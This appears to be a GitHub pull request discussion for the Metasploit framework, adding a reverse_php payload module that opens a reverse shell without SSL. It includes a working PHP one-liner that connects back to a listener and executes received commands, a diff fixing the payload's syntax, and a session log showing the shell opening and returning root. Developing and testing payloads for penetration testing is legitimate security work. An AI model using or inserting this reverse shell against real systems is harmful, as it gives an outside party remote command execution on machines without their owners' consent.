Add a reverse php shell without ssl

[jvoisin]

No description provided.

[jvoisin]

I copy-pasted most of the code from the reverse_php_ssl.rb one, do we want to please msftidy, or keep all the reverse shells similar?

[github-actions]

Thanks for your pull request! Before this can be merged, we need the following documentation for your module:

• Writing Module Documentation
• Template
• Examples

[bwatters-r7]

I copy-pasted most of the code from the reverse_php_ssl.rb one, do we want to please msftidy, or keep all the reverse shells similar?

Most of the rubocop complaints are about white space; I don't see any issue correcting those. The last line being an implicit return and assignment to an unused variable works in ruby, but it still hurts my soul a little.

[jvoisin]

The last line being an implicit return and assignment to an unused variable works in ruby, but it still hurts my soul a little.

What would be the right™ way to do it, and put balm on your soul?

[adfoster-r7]

@jvoisin Sorry for the delay on this, we've been pretty swamped on our side! 👍

Generating payload working:

msf6 payload(cmd/unix/reverse_php) > to_handler lhost=192.168.1.178

[+] php -r 'while ($s=@fsockopen("192.168.1.178:4444") {
  while ($l=fgets($s)) {
    exec($l, $o);
    $o=implode("
",$o) . "
";
    fputs($s,$o);
  }
}"
'&

Using the payload gives an error:

Parse error: syntax error, unexpected 'while' (T_WHILE) in Command line code on line 2

I made a small change to remove the newlines/whitespace, and fixed the syntax errors in the php payload, as well as a rubocop linting error:

diff --git a/modules/payloads/singles/cmd/unix/reverse_php.rb b/modules/payloads/singles/cmd/unix/reverse_php.rb
index a04c024733..ce1f636a5b 100644
--- a/modules/payloads/singles/cmd/unix/reverse_php.rb
+++ b/modules/payloads/singles/cmd/unix/reverse_php.rb
@@ -48,14 +48,14 @@ module MetasploitModule
   # Returns the command string to use for execution
   #
   def command_string
-    cmd = <<~PHP
-      while ($s=@fsockopen("#{datastore['LHOST']}:#{datastore['LPORT']}") {
+    cmd = <<~PHP.lines.map(&:strip).join
+      while ($s=@fsockopen("#{datastore['LHOST']}:#{datastore['LPORT']}")) {
         while ($l=fgets($s)) {
           exec($l, $o);
           $o=implode("\n",$o) . "\n";
           fputs($s,$o);
         }
-      }"
+      }
     PHP
     "#{datastore['PHPPath']} -r '#{cmd}'&"
   end

Generating:

msf6 payload(cmd/unix/reverse_php) > generate lhost=192.168.1.178 -f raw verbose=false

[+] php -r 'while ($s=@fsockopen("192.168.1.178:4444") {while ($l=fgets($s)) {exec($l, $o);$o=implode("",$o) . "";fputs($s,$o);}}"'&

handler:

msf6 payload(cmd/unix/reverse_php) > to_handler lhost=192.168.1.178

[+] php -r 'while ($s=@fsockopen("192.168.1.178:4444")) {while ($l=fgets($s)) {exec($l, $o);$o=implode("",$o) . "";fputs($s,$o);}}'&
[*] Payload Handler Started as Job 0

[*] Started reverse TCP handler on 192.168.1.178:4444 

Executing:

msf6 payload(cmd/unix/reverse_php) > [*] Command shell session 1 opened (192.168.1.178:4444 -> 192.168.1.178:53921) at 2023-09-29 13:14:22 +0100
sessions -i -1 -c whoami
[*] Running 'whoami' on shell session -1 (192.168.1.178)
root

Looks like this would be good to go after those tweaks 🤞